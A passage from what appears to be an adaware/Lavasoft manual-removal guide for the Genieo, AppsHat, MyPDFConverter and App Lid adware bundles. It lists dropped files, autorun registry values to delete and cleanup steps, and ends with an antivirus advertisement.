      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe (1856 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\MozillaHistoryView.chm (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\SQLite Copyright.htm (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Licenses.htm (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe (10430 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\LicenseAgreement.txt (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
      C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\config[1].json (778 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)
      C:\Windows\Installer\MSI6613.tmp (520 bytes)
      %Program Files% (x86)\MyPDFConverter\setup\Setup.exe (53 bytes)
      C:\Windows\Installer\MSIFE02.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (262 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (520 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen (1026190 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\updater_manifest.xml (297 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen (62942 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen (201149 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\partner_manifest.xml (550 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\Updater.log (11205 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\manifest.xml (644 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\partner_manifest.xml (550 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\281.js (485 bytes)
      C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.job (74 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\36.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils.dll (28539 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\182.js (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\288.js (553 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\14.js (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\234.js (1 bytes)
      %Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe (8330 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\78.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\nsisos.dll (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\extension.js (354 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\46.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\253.js (737 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\64.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\38.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\180.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2BA3.tmp (718555 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\2.js (63 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\StdUtils.dll (30 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\41.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\91.js (6584 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\345.js (607 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\ExecDos.dll (13 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils2.dll (3410 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\207.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.dll (46278 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\183.js (2 bytes)
      %Program Files% (x86)\App Lid\App Lid-buttonutil64.dll (3073 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\176142 (17985 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\354.js (4992 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\37.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\301.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\252.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\22.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\150014 (243819 bytes)
      %Program Files% (x86)\App Lid\App Lid-buttonutil64.exe (2105 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\223.js (825 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\45.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\21.js (3 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\4.js (3312 bytes)
      %Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe (7433 bytes)
      %Program Files% (x86)\App Lid\background.html (729 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\ipgeoapi_com[1].json (40 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\43.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\263.js (1 bytes)
      %Program Files% (x86)\App Lid\utils.exe (90899 bytes)
      %Program Files% (x86)\App Lid\App Lid-codedownloader.exe (8319 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\17.js (2392 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\242.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\177.js (784 bytes)
      C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5_user.job (74 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\184.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\7.js (685 bytes)
      %Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01.xpi (2321 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\28.js (536 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\13.js (6 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins.json (15 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\40.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\255.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\221.js (415 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\47.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\195.js (410 bytes)
      %Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\background.js (636 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\9.js (2 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\220.js (1552 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\UserInfo.dll (8 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\39.js (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\94.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\102.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\72.js (1552 bytes)
      %Program Files% (x86)\App Lid\App Lid-bg.exe (4185 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\System.dll (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\262.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\42.js (7 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.dll (33295 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\3.js (63 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\44.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\35.js (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\1.js (10 bytes)
      C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.job (77 bytes)
      %Program Files% (x86)\App Lid\App Lid-buttonutil.exe (1425 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\manifest.xml (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\104.js (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\246.js (8 bytes)
      %Program Files% (x86)\App Lid\App Lid-buttonutil.dll (2321 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\manifest[1].xml (25 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\md5dll.dll (14 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\200.js (809 bytes)
      %Program Files% (x86)\App Lid\App Lid.ico (9 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18} (4 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (IA64).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 (x86).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x86).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDB5.tmp (345 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A7..dll (15945 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BDF4.tmp (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC206.tmp (668 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\MyPDFConverter[1].msi (3239144 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC345.tmp (77 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C344.tmp (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC186.tmp (672 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x86).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC216..dll (15945 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BE15.tmp (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE27.tmp (705 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC284.tmp (647 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A6.tmp (671 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\_ISMSIDEL.INI (31310 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows XP (x64).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Setup.INI (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\0x0409.ini (784 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFBE.tmp (692 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDF5.tmp (77 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFDF.tmp (667 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE57..dll (15945 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFEF..dll (15945 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBD94.tmp (77 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE16.tmp (77 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x64).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC333.tmp (77 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\MyPDFConverter.msi (88453 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x64).prq (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC295..dll (15945 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C332.tmp (10 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvF068.tmp (23 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe (1568 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1504 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (56 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1212 bytes)
      C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (370 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab290.tmp (56 bytes)
      C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar291.tmp (2784 bytes)

    4. Delete the following value(s) in the autorun key (How to Work with System Registry):

      [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
      "mypdfconverterfr" = ""

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "GenieoUpdaterService" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe -wait 5"

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "GenieoSystemTray" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe"

    5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    No votes yet

    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now